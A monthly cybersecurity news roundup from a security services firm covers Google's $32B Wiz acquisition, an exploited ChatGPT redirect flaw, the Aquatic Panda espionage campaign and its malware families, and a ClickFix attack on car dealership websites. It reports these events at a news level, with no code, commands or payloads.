Components of DOT Security’s Services
Explore each of the core elements that combine to form DOT Security’s complete offering
See how it all comes together
DOT Security’s holistic service- A plan to get back up and running if a problem occurs
- Comply with data security laws and industry regulations
- Expert planning and training to improve overall security
- Protection for a controlled internal environment
- Coverage for individual systems and devices
- Control who can get into your networks
- Improved insight into data and communications
- Extra fortification for your most sensitive data
Risk Assessment
InsightsCybersecurity insights and analyses
Dive into the world of modern cybersecurity with explanations, predictions, and expert opinions
Find blogs, infographics, videos, and more
DOT Security insights- Definitions for industry terms and acronyms
- The complete beginner’s guide to everything cybersecurity
Cybersecurity Consulting
The DOT Report: Google Acquires Wiz in $32B Deal, Chat GPT Bug Exploited
March 25, 2025
7 minute read
The DOT Report is a monthly news series from DOT Security that covers the latest headlines and biggest stories in the cybersecurity field. These stories provide an opportunity to discuss both the technical and human elements at play, exploring how cybersecurity mechanisms and cyberattacks operate in real-world scenarios.
This month we’ll take a look at Google’s massive $32 billion acquisition of the cybersecurity firm Wiz, explore a bug in ChatGPT being exploited by threat actors, how the known APT group Aquatic Panda has been linked to a 10-month-long cyber espionage campaign, and the ClickFix attack that compromised over 100 car dealerships.
Sign up for our newsletter!
Analyzing these stories reveals deeper insights that help us better understand the relationship between cybersecurity principles in practice and the threat actors working to circumvent them.
Subscribe to the DOT Security blog to stay updated on all things cybersecurity, from the latest headlines to the newest technologies.
Google Acquires Wiz in Massive $32B Deal
Google is making its biggest acquisition ever, agreeing to buy cybersecurity firm Wiz for a jaw-dropping $32 billion. The move cements Google’s commitment to strengthening its cloud security as artificial intelligence drives a surge in demand for more robust protections.
The acquisition is not just a massive financial move—it’s a strategic play to gain an edge over rivals like Microsoft and Amazon in the cloud computing race.
Wiz, a company barely four years old, has skyrocketed to prominence in the cybersecurity world. Founded in 2020 by a group of Israeli military veterans, the firm has rapidly become a leader in cloud security, offering cutting-edge tools to protect data centers.
Now headquartered in New York, Wiz is projected to generate $1 billion in revenue this year—an impressive trajectory that made it a prime target for acquisition. By buying Wiz, Google confirms that cloud security is a top priority and hopes to enhance its security offerings for Google Cloud customers while also cutting costs.
The $32 billion purchase dwarfs Google’s previous record—a $12.5 billion acquisition of Motorola Mobility in 2012. It also ranks as the largest cybersecurity acquisition to date, a clear indication of how critical cloud security has become in today’s tech landscape.
The deal isn’t done quite yet, though. Google is already under intense antitrust scrutiny meaning regulators and law-makers alike are going to take a close look at whether the acquisition impacts market competition.
Despite potential regulatory challenges, Google CEO Sundar Pichai remains confident that the acquisition will deliver major benefits, both for the company and its customers. If approved, Wiz could become a cornerstone of Google’s cloud security strategy, helping businesses safeguard their data while reinforcing Google’s position in the AI-driven cloud computing boom.
Chat GPT Bug Exploit Leaves Businesses Vulnerable
A newly discovered security flaw in ChatGPT is being actively exploited by cybercriminals, raising alarms for organizations relying on the AI platform. The vulnerability, tracked as CVE-2024-27564 and rated with a CVSS score of 6.5, allows attackers to redirect users to malicious websites directly through the ChatGPT application.
While not the most severe flaw, its exploitation at scale has caught the attention of cybersecurity researchers.
Security firm Veriti first identified the exploit, noting that over 10,000 attack attempts originated from a single IP address in just one week. Their research indicates that 35% of examined organizations remain vulnerable due to misconfigurations in key cybersecurity defenses, including intrusion prevention systems (IPS), web application firewalls (WAFs), and general firewall settings.
U.S. financial institutions have been among the most frequently targeted, making the attack particularly concerning given the sensitivity of the data at risk.
Although OpenAI has not yet commented on the breach, security experts warn that AI-driven platforms like ChatGPT are becoming attractive targets for attackers seeking new avenues to exploit. Organizations that integrate AI tools into their workflows must ensure their security infrastructure is properly configured to detect and mitigate emerging threats.
This latest exploit highlights the evolving nature of cyberattacks in the AI era. As threat actors increasingly focus on AI-powered systems, businesses must remain proactive, routinely auditing their security settings and deploying robust defenses to prevent similar vulnerabilities from being weaponized.
Aquatic Panda Linked to 10-Month Espionage Campaign in 2022
In a meticulously orchestrated cyber-espionage campaign, the China-linked advanced persistent threat (APT) group known as Aquatic Panda has been implicated in a 10-month operation spanning from January to October 2022.
Dubbed "Operation FishMedley" by cybersecurity firm ESET, this campaign targeted seven organizations, including governmental bodies, Catholic charities, NGOs, and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States.
Aquatic Panda, also referred to as Bronze University, Charcoal Typhoon, Earth Lusca, and RedHotel, has been active since at least 2019 and is believed to operate under the broader umbrella of the Winnti Group (APT41) and is allegedly overseen by the Chinese contractor i-Soon.
In Operation FishMedley, the threat actors employed a suite of five distinct malware families to infiltrate targeted networks including:
- ScatterBee: A loader used to deploy additional malicious payloads.
- ShadowPad: A modular backdoor providing remote control capabilities.
- Spyder: An implant facilitating data exfiltration.
- SodaMaster: Previously associated with APT10, its use here suggests sharing among China-aligned APT groups.
- RPipeCommander: A newly identified C++ implant functioning as a reverse shell, capable of executing commands and collecting outputs.
The exact methods by which Aquatic Panda gained initial access to these organizations remain unclear. However, their continued reliance on well-documented implants like ShadowPad and SodaMaster, despite public exposure, underscores a persistent and adaptable threat landscape.
This campaign highlights the ongoing challenges posed by state-sponsored cyber-espionage groups and emphasizes the critical need for organizations worldwide to bolster their cybersecurity defenses against such sophisticated threats.
ClickFix Attack Compromises 100+ Car Dealership Sites
A supply chain attack has compromised more than 100 car dealership websites, originating from a breach of LES Automotive, a service provider for the automotive industry.
The attack used deceptive ClickFix prompts that tricked users into executing malicious commands through the Windows Run dialog, inadvertently granting attackers system access. Once inside, the attackers deployed malware like SectopRAT to further compromise affected systems.
This breach highlights the growing threat to the automotive sector's digital infrastructure, marking the second major attack on car dealerships in less than a year. It underscores the critical need for organizations to strengthen their cybersecurity practices, particularly when relying on third-party vendors, and to better secure their websites and systems against these sophisticated attack methods.
The ClickFix tactic, which exploits user trust, is gaining traction among cybercriminals, making it essential for users to stay vigilant against such deceptive prompts.
As these types of attacks become more common, organizations must reassess their cybersecurity protocols and integrate advanced threat detection systems. Regular audits of third-party vendors, ongoing user education, and enhanced monitoring of website security can help mitigate risks and safeguard against similar attacks in the future.
With cybercriminals continuously evolving their methods, proactive measures are vital to protecting sensitive data and maintaining trust with customers.
The DOT Report Signing Off
The stories this month covered a range of cybersecurity topics from major industry acquisitions to the ways threat actors are exploiting AI integrations, and how some of our oldest markets, like the auto industry, are prime targets for cybercriminals.
By investigating these stories, we gain a better understanding of the real-life threats that businesses face and a stark reminder of how crucial cybersecurity has become in a tech-dependent world.
Get regular cybersecurity updates on news, tech, and industry standards by subscribing to the DOT Security blog.